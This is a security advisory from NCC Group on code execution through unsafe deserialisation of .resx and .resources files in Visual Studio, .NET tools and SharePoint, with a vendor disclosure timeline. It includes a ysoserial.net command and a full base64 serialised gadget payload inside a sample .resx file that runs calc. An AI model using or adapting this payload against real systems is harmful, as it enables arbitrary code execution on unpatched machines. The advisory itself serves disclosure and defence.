Saltar a la navegación Saltar al contenido principal Ir al pie de página

Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products

08 febrero 2018

By NCC Group Publication Archive

Research Cyber Security Technical advisories 
Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Versions affected: products before July 2018 patch
Systems Affected: Visual Studio, .NET Framework, SharePoint
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier:
 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8172
 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8260
 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8300
Risk: Medium to High

Summary

A number of deserialisation issues within the resource files (.resx and .resources) were reported to Microsoft in January 2018 by Soroush Dalili from NCC Group. In July 2018, Microsoft issued multiple patches (CVE-2018-8172, CVE-2018-8172, and CVE-2018-8300) for a number of products that were unsafely handling resource files.

Since the July 2018 patch, .resx and .resources files that have the Mark of the Web (MOTW) cannot be opened directly in Visual Studio. The Resgen.exe tool also shows an error when MOTW is in place while the Winres.exe tool shows a warning message at all times. It should be noted that resource files that are extracted from compressed files or downloaded by non-IE/Edge browsers might not have the MOTW and should be handled with care.

Location

.resx and .resources files that were opened the Winres.exe tool.

.resx and .resources files that were compiled or decompiled by the ‘Resgen.exe’ tool.

.resx files that were opened by Visual Studio.

.resx and .resources files that were uploaded to SharePoint for localisation purposes. This was done by deploying SharePoint add-ins that were using resources.

Impact

It was possible to execute code and commands on the affected applications.

Details

The root cause of the vulnerability has been discussed at the following blog post:

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/

As described in the blog post, a serialised object can be embedded in a .resx file using multiple methods. The ysoserial.net project (https://github.com/pwntester/ysoserial.net) can be used to generate payloads.
For instance, in order to open the calculator tool, the following command could be used:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c calc

In order to use SoapFormatter that is also supported by resources, the ExploitClass class in ysoserial.net should be updated to run calculator (calc.exe) using the ActivitySurrogateSelector gadget.

The generated payload using the payload above can be embedded in a .resx file as shown below:

<?xml version="1.0" encoding="utf-8"?>

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 text/microsoft-resx
 
 
 2.0
 
 
 System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
 
 
 System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
 
 
 
  AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAcvYyBjYWxjBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=

This file could be compiled using the Resgen.exe tool to create a .resources extension.

Recommendation

Update the affected applications.

Please note that Visual Studio might need to be manually updated. Ensure that the Visual Studio Command Prompt also uses the latest version of Microsoft SDKs (.NET 4.7.2 at the time writing this advisory).

Vendor Communication

24/01/2018 .NET resources issues were reported for VS, .Net Framework tools, and IIS
26/01/2018 Microsoft asked to have the issues in separate reports/emails
02/02/2018 Reports were separated and sent to Microsoft
05/02/2018 SharePoint Online/on-prem RCE issue via resources were reported
05/02/2018 Microsoft assigned the case numbers and case managers
… SharePoint Online was patched urgently … 
… multiple emails were exchanged regarding the solution …
02/04/2018 Microsoft rejected the possible issue of .NET resources on IIS as a misconfiguration
… additional emails regarding the possible solutions were exchanged …
10/07/2018 Reported issues have been patched

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Soroush Dalili

NCC Group Publication Archive

NCC Group Publication Archive